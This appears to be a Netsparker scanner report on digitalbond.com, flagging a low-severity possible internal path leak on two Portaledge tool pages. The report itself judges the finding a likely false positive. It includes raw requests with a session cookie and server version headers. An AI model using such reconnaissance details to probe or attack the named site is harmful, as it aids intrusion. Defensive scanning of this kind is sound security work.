X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Link: <http://wp.me/P1lryr-2je>; rel=shortlink
Last-Modified: Tue, 19 Apr 2011 20:00:18 GMT
Vary: Accept-Encoding,Cookie,User-Agent
Etag: ceea6649f19b00fbe522eeac028b1b77
Content-Encoding:
X-Type: default


<![endif]-->
</head>
<body class="page page-id-8880 page-child parent-pageid-5503">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="colone" /><col class="coltwo" />
</colgroup>
<tr>

<!-- Header -->
<td id="header" colspan="2">

<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="http://www.digitalbond.com/" title="Digital Bond&#039;s SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501 current_page_ancestor"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1">&nbsp;</div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="http://www.digitalbond.com/"><img class="logo" src="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond&#039;s SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=1" title=""><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/zGN33S_Waterfall Banner - horizontal 2010.gif" alt="" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1">&nbsp;</div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" 
class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What&#8217;s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="http://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>

</td>
<!-- / Header -->

</tr>

<!-- Main Body -->
<tr id="bodyrow">

<!-- Left Sidebar -->
<td id="left">

<div id="text-3" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Bandolier Security Audit File" href="http://digitalbond.com/2011/02/14/bandolier-security-audit-file-for-sisco-iccp-server/">Bandolier Security Audit Files for SISCO ICCP Server</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/2011.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/2011.jpg" alt="" width="57" height="56" /></a></p><p><a title="ICSJWG" href="http://www.us-cert.gov/control_systems/icsjwg/conference.html">Dale Peterson presenting on USG Funded ICS Security Tools @ ICSJWG</a><br></p><p><br><a 
href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS Security Tool Mailing List</a><br><br></p></div> </div><div id="flexipages-3" class="widget flexipages_widget"><div class="widget-title"><h3>Pages</h3></div><ul> <li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" title="Consulting">Consulting</a></li> <li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" title="Critical Intelligence">Critical Intelligence</a></li> <li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" title="SCADApedia">SCADApedia</a></li> <li class="page_item page-item-5501 current_page_ancestor"><a href="http://www.digitalbond.com/tools/" title="Tools">Tools</a> <ul> <li class="page_item page-item-5502"><a href="http://www.digitalbond.com/tools/bandolier/" title="Bandolier">Bandolier</a></li> <li class="page_item page-item-5503 current_page_ancestor current_page_parent"><a href="http://www.digitalbond.com/tools/portaledge/" title="Portaledge">Portaledge</a> <ul> <li class="page_item page-item-9450"><a 
href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/" title="NERC CIP-5 Monitoring Modules">NERC CIP-5 Monitoring Modules</a></li> <li class="page_item page-item-8863"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-and-nerc-cip/" title="Portaledge and NERC CIP">Portaledge and NERC CIP</a></li> <li class="page_item page-item-9483"><a href="http://www.digitalbond.com/tools/portaledge/availability-event-class/" title="Availability Event Class">Availability Event Class</a></li> <li class="page_item page-item-8868"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-enumeration-event-class/" title="Enumeration Event Class">Enumeration Event Class</a></li> <li class="page_item page-item-8875"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-event-installation/" title="Portaledge Event Installation">Portaledge Event Installation</a></li> <li class="page_item page-item-8876"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-event-taxonomy/" title="Portaledge Event Taxonomy">Portaledge Event Taxonomy</a></li> <li class="page_item page-item-8880 current_page_item"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-sem-integration/" title="Portaledge SEM Integration">Portaledge SEM Integration</a></li> </ul></li> <li class="page_item page-item-5504"><a href="http://www.digitalbond.com/tools/quickdraw/" title="Quickdraw SCADA IDS">Quickdraw SCADA IDS</a></li> <li class="page_item page-item-5505"><a href="http://www.digitalbond.com/tools/the-rack/" title="The Rack">The Rack</a></li> <li class="page_item page-item-8994"><a href="http://www.digitalbond.com/tools/scada-honeynet/" title="SCADA Honeynet">SCADA Honeynet</a></li> <li class="page_item page-item-9353"><a href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/" title="ICS Security Tool Mail List">ICS Security Tool Mail List</a></li> </ul></li> <li class="page_item page-item-18"><a 
href="http://www.digitalbond.com/about-us/" title="About Us">About Us</a></li> <li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" title="Advertise">Advertise</a></li></ul></div>
</td>
<!-- / Left Sidebar -->



<!-- Main Column -->
<td id="middle">





<div class="post-8880 page type-page status-publish hen..
[Possible] Internal Path Leakage (Windows)

2 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact; however, this information can help an attacker either to identify other vulnerabilities or to exploit vulnerabilities that have already been identified.

Remedy

First, ensure that this is not a false positive. Due to the nature of the issue, Netsparker could not confirm that this file path is actually a real file path on the target web server. In this scan, both paths were reported on pages that document the Portaledge tool's installation and SEM integration (the URLs listed below), and the Server header in the captured responses identifies nginx, so the paths are most likely part of the published page content rather than a disclosure of the web server's own filesystem; verify this before treating the finding as a leak.
  • Error messages should be disabled.
  • Remove this kind of sensitive data from the output.

External References

- /tools/portaledge/portaledge-event-installation/

http://www.digitalbond.com/tools/portaledge/portaledge-event-installation/

Identified Internal Path(s)

C:\Program Files\PIPC\ACE\ClassLibraries

Request

GET /tools/portaledge/portaledge-event-installation/ HTTP/1.1
Referer: http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:00:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Tue, 19 Apr 2011 22:00:12 GMT
Cache-Control: max-age=7200, public, must-revalidate, proxy-revalidate
Pragma: public
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Link: <http://wp.me/P1lryr-2j9>; rel=shortlink
Last-Modified: Tue, 19 Apr 2011 20:00:12 GMT
Vary: Accept-Encoding,Cookie,User-Agent
Etag: 89c98888b0c8285bb23b4133a30873a9
Content-Encoding:
Content-Length: 8000
X-Type: default


- /tools/portaledge/portaledge-sem-integration/

http://www.digitalbond.com/tools/portaledge/portaledge-sem-integration/

Identified Internal Path(s)

C:\Program Files\PIPC\ACE\SEM.txt

Request

GET /tools/portaledge/portaledge-sem-integration/ HTTP/1.1
Referer: http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:00:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Tue, 19 Apr 2011 22:00:18 GMT
Cache-Control: max-age=7200, public, must-revalidate, proxy-revalidate
Pragma: public
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Link: <http://wp.me/P1lryr-2je>; rel=shortlink
Last-Modified: Tue, 19 Apr 2011 20:00:18 GMT
Vary: Accept-Encoding,Cookie,User-Agent
Etag: ceea6649f19b00fbe522eeac028b1b77
Content-Encoding:
X-Type: default


<![endif]-->
</head>
<body class="page page-id-8880 page-child parent-pageid-5503">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="colone" /><col class="coltwo" />
</colgroup>
<tr>


</tr>

<!-- Main Body -->
<tr id="bodyrow">




<!-- Main Column -->
<td id="middle">





<div class="post-8880 page type-page status-publish hen..